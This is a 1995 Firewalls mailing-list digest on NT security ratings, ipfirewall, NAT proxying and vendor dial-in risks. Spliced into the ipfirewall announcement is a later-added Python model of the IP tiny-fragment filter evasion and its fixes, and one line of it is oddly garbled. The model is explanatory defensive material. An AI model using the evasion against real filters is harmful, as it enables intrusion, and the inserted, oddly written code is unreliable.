Received: from mwunix.mitre.org (mwunix.mitre.org [128.29.154.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA14184 for ; Mon, 9 Oct 1995 08:34:05 -0700
Received: from tgate2.mitre.org (tgate2.mitre.org [128.29.154.211]) by mwunix.mitre.org (8.6.10/8.6.4) with SMTP id LAA18334 for <@mwunix.mitre.org:firewalls@GreatCircle.COM>; Mon, 9 Oct 1995 11:32:45 -0400
Received: from [128.29.250.7:2675] by tgate1 with SMTP id A403988 ; Mon, 9 Oct 95 11:32:27 EDT
Received: by mail06.mitre.org; (5.65/1.1.8.2/22Jun94-0628PM) id AA26852; Mon, 9 Oct 1995 11:35:00 -0400
Subject: Re: B2 rated WIndows NT?
From: bell@mail06.mitre.org (D. Elliott Bell)
To: firewalls@GreatCircle.COM
Message-Id: <951009113458.19096@mail06.mitre.org.0>
Date: Mon, 9 Oct 95 11:35:00 -0400
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Fumble fingers mistyped. Read "C2" for "B1" in the preceding.

>
>
> There is not a B Level version currently available. There is a C2
> Version available. Several companies are investigating and some have
> started building a B Level version, however. There are B Level network
> components available such as TNT DNSIX from Global Internet Software
> Group in Monticello, IL:
>
> Global Internet Software Group (formerly, Blue Ridge Software, Inc.)
> 107 S. State St., P.O. Box 406, Monticello, IL 61856
> 217-762-2375 Fax:-5408
>
> Hope this helps ...
>
> Mark A. Podracky
> Sr. Information Security Specialist
> Integrated Data Systems
> 14170 Newbrook Drive, Suite 201
> Chantilly, VA 22021-2223
>
> 703-803-9115 extension 19
>
> ______________________________ Reply Separator _________________________________
> Subject: B2 rated WIndows NT?
> Author: Xin LI at ccSMTP
> Date: 10/9/95 8:00 AM
>
> Hi, there:
>
> It's said that there is a secure version of Windows NT rated B class (probably B2)
> available. Does anyone know where I can get more information about that?
>
> Any advice and information are welcome and very appreciated.
>
> Thanks in advance,
>
> Li, Xin
>
> Senior System Engineer
> NEC Singapore Pte Ltd
> No. 1 Maritime Square #12-10
> World Trade Center
> Singapore, 099253
> Republic of Singapore
> Tel: +65-277-2227
> Fax: +65-271-5988
> Email: lixin@wpo.necsin.fc.nec.co.jp
>

From firewalls-owner Mon Oct 9 10:31:02 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA16531 for firewalls-outgoing; Mon, 9 Oct 1995 10:23:13 -0700
Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA16524 for ; Mon, 9 Oct 1995 10:23:11 -0700
Received: from nahanni.BouletFermat.ab.ca by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id KAA03347; Mon, 9 Oct 1995 10:14:38 -0700
Received: (from danny@localhost) by nahanni.BouletFermat.ab.ca (8.6.9/8.6.9) id LAA22509 for firewalls@greatcircle.com; Mon, 9 Oct 1995 11:25:08 -0600
Date: Mon, 9 Oct 1995 11:25:08 -0600
From: Danny Boulet
Message-Id: <199510091725.LAA22509@nahanni.BouletFermat.ab.ca>
To: firewalls@greatcircle.com
Subject: New version of ipfirewall with Linux support now available
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

The latest version of ipfirewall (v2.0d) is now available via ftp.

ipfirewall is an IP packet filtering tool which is similar to the packet filtering facilities provided by most commercial routers. Once the facility has been installed on a host computer, the system administrator defines a set of blocking filters and a set of forwarding filters. The blocking filters determine which packets are to be accepted by the host. The forwarding filters determine which packets are to be forwarded by the host. Each filter describes a class of packets and how they are to be treated (rejected and logged, accepted silently or accepted and logged).

Packets can be filtered based on the following characteristics:

- type of packet (all IP, TCP, UDP, ICMP)
- source and destination IP address (and port number for TCP and UDP)
- which network interface it arrived on
- whether or not the packet is a TCP/IP connection request (i.e. a packet that is attempting to initiate a TCP/IP session)
- whether or not the packet is a head, tail or arbitrary IP fragment
- whether or not the packet has certain IP options defined

Changes since the last version are:

- a bugfix that prevents a vandal from using certain degenerate IP packet fragments to get past certain kinds of filters (registered users of ipfirewall got this bug fix on the day after I received the bug report)
- support for Linux (kernel version 1.2 although it probably isn't very hard to incorporate it into other versions)

With this version, ipfirewall now supports BSD/OS (including older versions of BSD/386), FreeBSD, Linux and NetBSD.

This latest version is available from the following locations:

ftp:ftp.bsdi.com//contrib/networking/security/ipfirewall_v2.0d.shar.gz
ftp:ftp.nebulus.net//pub/bsdi/security/ipfirewall_v2.0d.shar.gz

I can also provide it to you via e-mail as four shar files.

If you have any questions, comments or suggestions, please contact me at danny@BouletFermat.ab.ca

ipfirewall is distributed on a shareware basis. Registered users receive a bound user's guide in addition to better and faster support (so far, I've managed to provide registered users with a bug fix within 48 hours of any security related bug report). Contact me or look at the README file in the distribution for more details.
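The announcement above lists the fields a filter can match on and mentions a fix for "degenerate IP packet fragments" getting past some filters. The block below is an added example written for this page, not ipfirewall's code (its rule syntax and internals are not on this page, and the exact bug fixed is not described): a small filter model in Python with the listed criteria, showing the generic tiny-fragment / offset-one evasion that RFC 1858 (October 1995) describes against a "TCP connection request" rule, and the two sanity checks that close it. Packets are constructed records, not parsed from the wire, and the addresses are documentation ranges.

```python
"""Packet-filter model: the filter criteria listed in the ipfirewall
announcement, and how 'degenerate' IP fragments can slip a TCP connection
request past a naive connection-request rule.

Added example; this is not ipfirewall's code, its rule syntax is not shown
on this page, and the specific bug Danny Boulet fixed is not described
beyond 'certain degenerate IP packet fragments'.  The evasion modelled here
is the generic tiny-fragment / offset-1 overlap case (RFC 1858).  Packets
are constructed records, not parsed from the wire.
"""
from dataclasses import dataclass

TCP_HDR_MIN = 20        # bytes of TCP header needed to reach the flags byte
EXT_IFACE = "ext0"      # the interface facing the outside
TELNET = 23


@dataclass
class Packet:
    proto: str                  # "tcp", "udp" or "icmp"
    src: str
    dst: str
    iface: str                  # interface the packet arrived on
    sport: int = 0
    dport: int = 0              # 0 when the ports are not in this fragment
    frag_off: int = 0           # IP fragment offset, in 8-byte units
    more_frags: bool = False    # IP MF bit
    tlen: int = 0               # transport bytes carried by this fragment
    syn: bool = False           # TCP flags, only meaningful if carried
    ack: bool = False
    ipopts: tuple = ()          # e.g. ("lsrr",)


def frag_class(p: Packet) -> str:
    """head / middle / tail / none, as a filter can classify a fragment."""
    if p.frag_off == 0:
        return "head" if p.more_frags else "none"
    return "middle" if p.more_frags else "tail"


def is_syn_request(p: Packet):
    """True for a TCP connection request (SYN set, ACK clear).  None when
    this fragment does not carry the flags byte, so the answer is unknown."""
    if p.proto != "tcp" or p.frag_off != 0 or p.tlen < TCP_HDR_MIN:
        return None
    return p.syn and not p.ack


def naive_filter(p: Packet) -> str:
    """Policy: reject and log TCP connection requests to telnet arriving on
    the outside interface; accept everything else.  Non-head fragments are
    accepted on the theory that only the head fragment carries the ports."""
    if (p.iface == EXT_IFACE and p.proto == "tcp" and p.frag_off == 0
            and p.dport == TELNET and is_syn_request(p)):
        return "reject+log"
    return "accept"


def hardened_filter(p: Packet) -> str:
    """Same policy, with the checks a filter needs before it can trust the
    header fields it matches on."""
    if p.iface == EXT_IFACE:
        if "lsrr" in p.ipopts or "ssrr" in p.ipopts:
            return "reject+log"     # source routed: the src address is a lie
        if p.proto == "tcp" and p.frag_off == 0 and p.tlen < TCP_HDR_MIN:
            return "reject+log"     # tiny head fragment: flags not visible
        if p.frag_off == 1:
            return "reject+log"     # would overwrite TCP bytes 8..15 on reassembly
    return naive_filter(p)


def reassemble(frags):
    """What the destination host sees after reassembly (flags are OR-ed over
    the fragments, which is what an overlapping write amounts to here)."""
    head = next(f for f in frags if f.frag_off == 0)
    return Packet(head.proto, head.src, head.dst, head.iface, head.sport,
                  head.dport, 0, False, sum(f.tlen for f in frags),
                  any(f.syn for f in frags), any(f.ack for f in frags))


def run(filter_fn, packets):
    return [filter_fn(p) for p in packets]


# Constructed traffic (not a capture).  Addresses are documentation ranges.
PLAIN_SYN = Packet("tcp", "203.0.113.9", "192.0.2.10", EXT_IFACE,
                   sport=40000, dport=TELNET, tlen=20, syn=True)
# The same SYN split so the flags land in the second fragment: 8 bytes of
# TCP (ports + sequence number) in the head, the rest at offset 1.
TINY_HEAD = Packet("tcp", "203.0.113.9", "192.0.2.10", EXT_IFACE,
                   sport=40000, dport=TELN 
                   if False else TELNET, more_frags=True, tlen=8)
FLAG_TAIL = Packet("tcp", "203.0.113.9", "192.0.2.10", EXT_IFACE,
                   frag_off=1, tlen=12, syn=True)
BIG_UDP_MID = Packet("udp", "203.0.113.9", "192.0.2.10", EXT_IFACE,
                     frag_off=185, more_frags=True, tlen=1480)
SOURCE_ROUTED = Packet("udp", "10.0.0.5", "192.0.2.10", EXT_IFACE,
                       sport=53, dport=53, tlen=40, ipopts=("lsrr",))

if __name__ == "__main__":
    evasion = [PLAIN_SYN, TINY_HEAD, FLAG_TAIL]
    print("naive    ", run(naive_filter, evasion))
    print("hardened ", run(hardened_filter, evasion))
    print("host sees SYN:", is_syn_request(reassemble([TINY_HEAD, FLAG_TAIL])))
```

The naive filter passes both fragments (the head because it cannot see the flags, the tail because it is not a head), while the host reassembles them into a SYN to port 23. The hardened version drops any TCP head fragment too short to carry the flags and any fragment at offset one, which is enough because a legitimate stack never produces either.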
-Danny

From firewalls-owner Mon Oct 9 11:09:18 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA16825 for firewalls-outgoing; Mon, 9 Oct 1995 10:40:12 -0700
Received: from strydr.strydr.com (strydr.strydr.com [199.217.201.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA16818 for ; Mon, 9 Oct 1995 10:40:07 -0700
Received: (from ds3721@localhost) by strydr.strydr.com (8.6.12/8.6.11) id MAA21572 for firewalls@greatcircle.com; Mon, 9 Oct 1995 12:38:35 -0500
From: David Schnardthorst
Message-Id: <199510091738.MAA21572@strydr.strydr.com>
Subject: Oracle <-> Firewall
To: firewalls@greatcircle.com
Date: Mon, 9 Oct 1995 12:38:34 -0500 (CDT)
Organization: Stryder Communications, Inc.
Address: 869 St. Francois, Florissant, Mo. 63031
Telephone: (314)838-6839
Fax: (314)838-8527
X-Mailer: ELM [version 2.4 PL23]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 784
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Does anybody know of a way to get Oracle information through a firewall? We are setting up a firewall, with our Web Servers on the outside; however, we need to pass some information from an Oracle Database through the firewall to the outside Web Servers. Has anybody done this, and if so, could you please give me some ideas of how to accomplish this.

============================================================================
David Schnardthorst, System Administrator   * Phone: (314)838-6839
Stryder Communications, Inc.                * Fax: (314)838-8527
869 St. Francois                            * E-Mail: ds3721@strydr.com
Florissant, MO 63031                        * URL: http://www.strydr.com
============================================================================

From firewalls-owner Mon Oct 9 11:31:50 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA18326 for firewalls-outgoing; Mon, 9 Oct 1995 11:22:17 -0700
Received: from blob.best.net (blob.best.net [204.156.128.88]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA18319 for ; Mon, 9 Oct 1995 11:22:14 -0700
From: yobie@yobie.com
Received: from shell1.best.com (shell1.best.com [204.156.128.10]) by blob.best.net (8.6.12/8.6.5) with ESMTP id LAA09835; Mon, 9 Oct 1995 11:20:53 -0700
Received: from best.com (yobie.vip.best.com [204.156.155.53]) by shell1.best.com (8.6.12/8.6.5) with SMTP id LAA23799; Mon, 9 Oct 1995 11:20:50 -0700
Date: Mon, 9 Oct 1995 11:20:50 -0700
Message-Id: <199510091820.LAA23799@shell1.best.com>
To: LIXIN@wpo.necsin.fc.nec.co.jp, firewalls@GreatCircle.COM
Subject: Re: B2 rated WIndows NT?
X-Mailer: ProntoIP [version 1.0]
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Microsoft has just announced that NT 3.1 is now officially certified by the US NSA as C2 compliant.

yobie@yobie.com
yobie@msn.com
yobie@well.sf.ca.us
102262.2260@compuserve.com
yobie@best.com

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQINAzBWg18AAAEQANnXKRohQlsdi+E2pVGH9/0ljIJFwg6TCQQ37Lcv8LfIR1RP
FbwXDfMAWtRKQkYtHUa18png/qMlDJeaethHDaotRMuhUtDpvWxLH7HmWyJ6sz78
ZHN3/ddtLrzrb+fYgjXhBnkSckmxwNQ8o1k4E45UvWGL2BzldVeOKmmBHjI8hgxX
lgPAw+Ozl2JESYvRjj3OT1jHFGlri/Hzvd/D7kbkhF6eMcCotX1h6ZcoTUka5qqh
PzKr04zCzQrw0z/Qy5St1gA2gB40mwsxICnrLo7y0fXilFT0qtQI+bj2pV2rfPhe
KQYXLHuL3Hrv8vUhciPtNrS3iPESTsIeADZ3r+0g6RJ1XDkZ1P9iaM4S6TRjugw1
CmBaj9rpkJ79MV235n3a0q6ZlWMzhPJ5yz+kt2UdBMeeWXT5eV+AB0tfgYUt9Mss
G8/h+m8FypdxKlEs/9e3PtROmoIm2OXKUEFzY9Cl6Ew0nisCXyPYtuRRrC7w6EWR
oj5WItiIdZvbN9GmTJ5seBA2TwAxKcDw7LEieaItCcUsG955jbagOaptBOPSUrv8
LJA40PIPgXpXP+SEJiL9wJQ5TGvkAsZkw+X9z26c9chImPy5A7qCZy3R/XZYu0Hc
OCd2zQnjzw87LKfIhJ3LDHMZADBdLvVdFfCd4EihjldGdzGzoQJ1FGhpIpSRAAUT
tCBZb2JpZSBCZW5qYW1pbiA8eW9iaWVAeW9iaWUuY29tPg==
=9HBa
-----END PGP PUBLIC KEY BLOCK-----

From firewalls-owner Mon Oct 9 12:01:02 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA18731 for firewalls-outgoing; Mon, 9 Oct 1995 11:45:38 -0700
Received: from bramber.windsor.com (bramber.windsor.com [199.181.96.54]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA18723 for ; Mon, 9 Oct 1995 11:45:31 -0700
Received: (from erics@localhost) by bramber.windsor.com (8.6.12/8.6.12) id OAA00130; Mon, 9 Oct 1995 14:44:11 -0400
From: "Eric V. Smith"
Message-Id: <199510091844.OAA00130@bramber.windsor.com>
Subject: Re: Network Address Translation stuff
To: paul@vix.com (Paul A Vixie)
Date: Mon, 9 Oct 1995 14:44:11 -0400 (EDT)
Cc: firewalls@GreatCircle.COM
In-Reply-To: <9510061801.AA28453@wisdom.home.vix.com> from "Paul A Vixie" at Oct 6, 95 11:01:13 am
Reply-To: EricSmith@windsor.com
X-Mailer: ELM [version 2.4 PL24]
Content-Type: text
Content-Length: 2506
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Paul A Vixie wrote:
> > > The trick is to use an FTP proxy without the client having to know that
> > > it's talking to an FTP proxy. With a simple DNS trick and a complicated
> > > FTP proxy, you can make these ends meet.
> >
> > Could you explain this in a little more detail?
>
> Assume an RFC 1597 net which cannot exchange packets with the outside world.
> Everything a host on the internal net does, it does with other internal hosts
> or with some kind of fancy border gateway. This includes name service.
>
> Assume that the name server is smart enough to answer "creatively" when asked
> certain questions by internal hosts about external hosts. The border gateway
> makes the assumption that the time between asking for a remote host's address
> and attempting to connect to that address will be relatively short, and that
> these events are for the most part paired (other than as provided for by DNS
> caching on intermediate internal name servers.)
>
> Assume that the addresses given back by our "creative" border name server will
> refer to internal addresses (probably using alias interfaces) on some border
> machine, and that border machine has the "socket" command available, and that
> DNS replies can be made to coincide with execution of "socket" commands.
>
> Assume that for protocols which do not contain addresses within them, such as
> telnet, the above is all that's required. In other cases, like SMTP where the
> internal hostnames may not be mappable by an external SMTP server, an
> application layer gateway (like sendmail running as a mail relay) will be used. In
> the case of FTP, the application layer gateway is fired up by the creative DNS
> server and it is given the desired remote host name/address mappings needed to
> complete the transaction even though the internal FTP client's TCP connection
> has "ended" at the border.

< sorry for the long quotation, but I thought it was all needed, and some may have forgotten the subject matter >

Doesn't this assume that the smart DNS server knows which of these protocols is being requested for each address, so that it knows which proxy to start up on the socket it created? Or am I missing something?

--
Eric V. Smith           | Some for renown on scraps of learning dote,
EricSmith@windsor.com   | And think they grow immortal as they quote.
Windsor Software Corp   +----------------------------------+ Edward Young
http://www.windsor.com/   Windows NT, Unix, SQL Server     | English poet

From firewalls-owner Mon Oct 9 12:31:17 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA19538 for firewalls-outgoing; Mon, 9 Oct 1995 12:14:18 -0700
Received: from gw.home.vix.com (gw.home.vix.com [192.5.5.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA19531 for ; Mon, 9 Oct 1995 12:14:15 -0700
Received: by gw.home.vix.com id AA20413; Mon, 9 Oct 95 12:12:55 -0700
X-Btw: vix.com is also gw.home.vix.com and vixie.sf.ca.us
Received: by wisdom.home.vix.com id AA30560; Mon, 9 Oct 1995 12:12:55 -0700
Message-Id: <9510091912.AA30560@wisdom.home.vix.com>
To: firewalls@greatcircle.com
Subject: Re: Network Address Translation stuff
In-Reply-To: Your message of "Mon, 09 Oct 1995 14:44:11 EDT." <199510091844.OAA00130@bramber.windsor.com>
Date: Mon, 09 Oct 1995 12:12:55 -0700
From: Paul A Vixie
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> Doesn't this assume that the smart DNS server knows which of these
> protocols is being requested for each address, so that it knows which
> proxy to start up on the socket it created? Or am I missing something?
> --
> Eric V. Smith

yes, or it requires a kernel with a preemptive icmp socket.

From firewalls-owner Mon Oct 9 12:36:08 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA19140 for firewalls-outgoing; Mon, 9 Oct 1995 12:02:22 -0700
Received: from nav.cc.tx.us (nav.cc.tx.us [192.152.226.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA19133 for ; Mon, 9 Oct 1995 12:02:18 -0700
Received: by nav.cc.tx.us (AIX 3.2/UCB 5.64/4.03) id AA54553; Mon, 9 Oct 1995 14:03:41 -0500
Date: Mon, 9 Oct 1995 14:03:41 -0500 (CDT)
From: Dana Brewer
To: Danny Boulet
Cc: firewalls@greatcircle.com
Subject: Firewall on RS/6K
In-Reply-To: <199510091725.LAA22509@nahanni.BouletFermat.ab.ca>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

We're looking into installing a "firewall" on our RS/6k. We don't have the budget to buy any of the software packages that I see mentioned on this list. What are some of the things that we can do cheaply (free is even better) to make the machine more secure?

**************************************************************************
Dana Brewer                    Internet: dana@nav.cc.tx.us
Director, Computer Center      Phone   : 903-874-6501
Navarro College                FAX     : 903-874-4636
3200 W. 7th Ave.
Corsicana, TX 75110
**************************************************************************

From firewalls-owner Mon Oct 9 13:31:20 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA22084 for firewalls-outgoing; Mon, 9 Oct 1995 13:10:11 -0700
Received: from iss.net (iss.iss.net [204.241.60.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA22077 for ; Mon, 9 Oct 1995 13:10:07 -0700
Received: (from cklaus@localhost) by iss.net (8.6.4/8.6.4) id QAA16898 for firewalls@greatcircle.com; Mon, 9 Oct 1995 16:06:11 -0700
From: Christopher Klaus
Message-Id: <199510092306.QAA16898@iss.net>
Subject: Announcement: Alert Mailing List
To: firewalls@greatcircle.com
Date: Mon, 9 Oct 1995 16:06:10 +1494730 (PDT)
X-Mailer: ELM [version 2.4 PL20]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 2229
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

(YAML - yet another mailing list ;-) )

Announcing a new security mailing list - The Alert. The Alert will be covering the following topics:

- Security Product Announcements
- Updates to Security Products
- New Vulnerabilities found
- New Security Frequently Asked Question files.
- New Intruder Techniques and Awareness

To join, send e-mail to request-alert@iss.net and, in the text of your message (not the subject line), write:

subscribe alert

To remove, send e-mail to request-alert@iss.net and, in the text of your message (not the subject line), write:

unsubscribe alert

This is a moderated list in the effort to keep the noise to a minimum and provide quality security information.

If your site is interested in network security, we put out several FAQs (Frequently Asked Questions) that cover the following main areas of topic:

Vendor Contacts - Who the security contacts are at IBM, HP, Dec, Motorola, etc.
  - Web page at: http://iss.net/iss/vendor.html
Patches - List of all security related patches categorized by OS type.
  - Web page at: http://iss.net/iss/patch.html
Compromise - Check list of things to do if your machines are compromised.
  - Web page at: http://iss.net/iss/compromise.html
Anonymous FTP Security - How to correctly set up FTP and check for vulnerabilities.
  - Web page at: http://iss.net/iss/anonftp.html
Sniffers - What they are. How they work. How to detect them. And solutions.
  - Web page: http://iss.net/iss/sniff.html
Security Mailing Lists - A comprehensive list of security mailing lists.
  - Web page: http://iss.net/iss/maillist.html

If possible, it might be a good idea for you to add links to the above web pages on your own Web server and point people who need to know some of the network security issues to the web page. It is possible to point to all of the FAQ pages at: http://iss.net/iss/faq.html

--
Christopher William Klaus                   Voice: (770)441-2531. Fax: (770)441-2431
Internet Security Systems, Inc.             "Internet Scanner lets you find
2000 Miller Court West, Norcross, GA 30071   your network security holes
Web: http://iss.net/  Email: cklaus@iss.net  before the hackers do."
From firewalls-owner Mon Oct 9 14:02:29 1995
Date: Mon, 9 Oct 95 15:40:02 -0400
Message-Id: <9510091940.AA10851@su1.in.net>
To: Edward Maillet
From: frankw@in.net (Frank Willoughby)
Subject: Re: Vendor Dial-in
Cc: firewalls@GreatCircle.com

You brought up a good point - and a question that is seldom raised.  In the
hurry to get problems solved quickly, many people don't go to the trouble to
think about the "what ifs" involved when vendors dial in to their systems /
networks.  Hats off to you for forward thinking.

I have had to deal with this problem a number of times in a previous life,
and in a nutshell, I would be *extremely* cautious about letting *any* vendor
log into my network to solve anything.  You have no way of knowing (or
verifying) how secure the vendor's network is, or who the person is (could be
a hacker with a daytime job).  (Also, if the other company had a worm running
loose on their network and you connect the two networks together...).  8^(

In almost all situations, there are alternatives.  I would recommend finding
one that avoids having the vendor log in, or at the very least restricts
things so much that the damage is contained.

A few possible ways of handling the situation (in no particular order):

1) "Sorry, but our policy doesn't allow dial-in connections".  Probably won't
   work, but it's worth a try.  The other company might even suggest
   alternatives.  If they want your business, they will work with you on this.
   If they balk, ask to log onto their network.  8^)

2) Troubleshoot the problem over the phone (like most helpdesks do).  This
   assumes that the person performing the actions understands the technical
   ramifications of what they are doing.

3) The PC Anywhere idea was pretty good, but have fun trying to find someone
   to monitor the keystrokes at 2am.  Also, the person doing the monitoring
   may not necessarily understand what the vendor is doing and would not be in
   a position to detect/prevent unauthorized or malicious activities.  Aside
   from that, it is a good idea.  (Friendly greetings back to Holland)  8^)

4) Create a copy of the system to be troubleshot, throw it on an isolated LAN
   (with no other systems on it; disconnect it from all other networks), and
   provide a secure dial-in service.  Don't forget to tape up and mark the
   ends of the cables so that no one accidentally connects the isolated LAN to
   your internal LAN.  Any damage is contained to the system / isolated LAN.

5) Have them appear on-site to solve the problem.  <== My favorite, as the
   person can be identified/authenticated.

6) In all cases mentioned above, the vendor should have signed the appropriate
   NDA, Confidentiality, and Liability forms.  The forms should be
   appropriately worded (similar to the infamous s/w license agreements, but
   with the deck stacked in your favor).  Put it in writing that if anything
   happens, they are responsible for reimbursing you for all expenses &
   damages, system rebuilds, etc.

7) Tap the incoming line and have the output go to a printer (after writing
   the date/time started and initialling it).  Just remember that the printout
   must be interpreted in the proper context of when the commands are given.
   (There are ways to get around this, but not in a public forum).

8) FTP the log files to them & FTP the solution from them.

All of the above depends on the value of what you are protecting, and how
much management support you will receive in your wise decision to restrict
dial-in connections.  If it was me, I wouldn't let the dial-in connection
happen if there was any alternative.

Best Regards,

Frank

From firewalls-owner Mon Oct 9 14:31:02 1995
From: "Eric V. Smith"
Message-Id: <199510092117.RAA03630@bramber.windsor.com>
Subject: Re: Network Address Translation stuff
To: paul@vix.com (Paul A Vixie)
Date: Mon, 9 Oct 1995 17:17:12 -0400 (EDT)
Cc: firewalls@GreatCircle.COM
In-Reply-To: <9510091912.AA30560@wisdom.home.vix.com> from "Paul A Vixie" at Oct 9, 95 12:12:55 pm
Reply-To: EricSmith@windsor.com

Paul A Vixie wrote:
> 
> > Doesn't this assume that the smart DNS server knows which of these
> > protocols is being requested for each address, so that it knows which
> > proxy to start up on the socket it created?  Or am I missing something?
> 
> yes, or it requires a kernel with a preemptive icmp socket.

Sorry, I didn't make my question obvious.  How does the DNS server know if a
request for the name foo.bar.com is for FTP, telnet, finger, or whatever?  I
assume it could tell SMTP by an MX request, but what about the others?

-- 
Eric V. Smith           | Some for renown on scraps of learning dote,
EricSmith@windsor.com   | And think they grow immortal as they quote.
Windsor Software Corp   +----------------------------------+ Edward Young
http://www.windsor.com/   Windows NT, Unix, SQL Server     | English poet

From firewalls-owner Mon Oct 9 15:00:19 1995
From: "Marcus J. Ranum"
Message-Id: <199510092144.RAA00711@switchblade.iwi.com>
Subject: firewalls-standards shutdown -
To: firewalls@greatcircle.com
Date: Mon, 9 Oct 1995 17:44:07 -0400 (EDT)
Reply-To: mjr@iwi.com
Organization: Information Warehouse! Inc, Baltimore, MD

Who says mailing lists never die? :)

The firewalls-standards mailing list is now officially defunct.  There was a
technical accident in the majordomo server that wound up zapping the
subscription and nobody noticed, because the list has been completely silent.
So we've decided it's time for a merciful bullet.

I confess in retrospect that I'm somewhat perplexed at the way the list died.
I guess it's a good sign of a dynamic industry that growth and technological
advance is still more interesting than standards and methods.  If you look at
the archive, 90% of the discussion was about performance measures.  So at
least we've learned that that was a "hot issue", although it's apparently
still not hot enough for anyone to bother actually going and scientifically
measuring firewalls.

Thanks to all who participated!  It was worth at least trying, to see what
the issues were.

mjr.

From firewalls-owner Mon Oct 9 15:31:23 1995
Date: Mon, 9 Oct 1995 18:18:58 -0400 (EDT)
From: "A. Padgett Peterson, P.E. Information Security"
To: firewalls@greatcircle.com
Message-Id: <951009181858.2106567f@hobbes.orl.mmc.com>
Subject: B2 rated Windoze NT

>Microsoft has just announced that NT 3.1 is now officially certified by
>the US NSA as C2 compliant.

But was it certified while connected to a network?  In fact, I wonder if it
even had a NIC installed (have not gotten the new catalog yet).  Suspect
someone here (Baltimore) this week will know...

Warmly,
Padgett

From firewalls-owner Mon Oct 9 16:31:26 1995
Date: Mon, 9 Oct 95 17:58:09 -0400
Message-Id: <9510092158.AA17727@su1.in.net>
To: mjr@iwi.com
From: frankw@in.net (Frank Willoughby)
Subject: Re: firewalls-standards shutdown -
Cc: firewalls@GreatCircle.com

Marcus,

I personally feel that it was an excellent idea.  However, I think where the
project may have gotten bogged down is that some companies may have felt that
participating in the standards mailing list would either have been an
admission of inadequacy if something was posted that they didn't have, or it
may have given hints about products under development, or someone from one
company may make a suggestion only to see a competitor reach the market
first.  The same things happen at IEEE standards meetings.

Best Regards,

Frank

From firewalls-owner Mon Oct 9 17:00:32 1995
Date: Mon, 9 Oct 95 19:49 EDT
From: Wilner@DOCKMASTER.NCSC.MIL
Subject: Re: new firewall book (Chapman & Zwicky)
To: firewalls@GREATCIRCLE.COM
Message-ID: <951009234916.486639@DOCKMASTER.NCSC.MIL>

Hannan writes:

> True, both of these [high-assurance trusted platforms or
> formal modeling of TCP/IP protocols] are required knowledge
> for firewalling, and also subsets of firewall theory.

My learned colleague's assertion speaks for itself.

From firewalls-owner Mon Oct 9 17:01:02 1995
Date: Mon, 9 Oct 95 19:42 EDT
From: Wilner@DOCKMASTER.NCSC.MIL
Subject: Re: B2 rated WIndows NT?
To: firewalls@GREATCIRCLE.COM
Message-ID: <951009234245.245397@DOCKMASTER.NCSC.MIL>

> It's said that there is a [B2-secure Windows NT] available.
> Does any one know where can I get more information about that?

Don't believe it.  Microsoft has neither the inclination nor the experience
to satisfy the rigorous design and documentation requirements to merit such a
rating.  I have certainly heard many, many stories about Microsoft's forays
into the world of trusted computing.  I have not seen any evidence
personally.  The best POC that I know of at this time is Ken Moss,
206-936-7774.  Come to think of it, the area code may have changed to 360.

From firewalls-owner Mon Oct 9 19:00:25 1995
Date: Tue, 10 Oct 1995 11:38:42 +1000 (EST)
From: Benno
To: Firewalls@GreatCircle.COM

From firewalls-owner Mon Oct 9 19:31:02 1995
From: Alan Hannan
Message-Id: <199510100223.VAA09657@westie.mid.net>
Subject: Re: new firewall book (Chapman & Zwicky)
To: Wilner@DOCKMASTER.NCSC.MIL
Date: Mon, 9 Oct 1995 21:23:39 -0500 (CDT)
Cc: firewalls@GreatCircle.COM
In-Reply-To: <951009234916.486639@DOCKMASTER.NCSC.MIL> from "Wilner@DOCKMASTER.NCSC.MIL" at Oct 9, 95 07:49:00 pm

  It is unfortunate you brought your petty flamefest to the public, Wilner.

  Your rationale of insulting me because I don't feel your areas of study
  (perhaps expertise, from what you say) are topical for Firewalls is quite
  immature.  My point in our discussion was that the things you work on are
  not directly related to the things most of us are interested in.

  I think you're just sad that no one is as incredibly intelligent as
  yourself.  Perhaps because most of us are busy actually doing useful things
  for the real world, instead of trying to invent proprietary standards for
  our superiors so we can institute more useless regulations.

  However, that would be arguing on principles, and not out of context, so
  perhaps I should return the favor:

Wil> At the risk of sounding arrogant, this is one of the most
Wil> lightweight, ill-structured arguments I have encountered.
Wil> Firewalling does not read "separating networks according to a
Wil> given security policy": it reads "slap together a few quick
Wil> fixes and some value-added code and tell people it's secure."

  - in reference to TIS's Gauntlet Firewall System

  We don't claim to play perfection, Mr. Theorist.  We live in the real world.

Wil> This is just the
Wil> kind of sophomoric flaming I would expect from a system
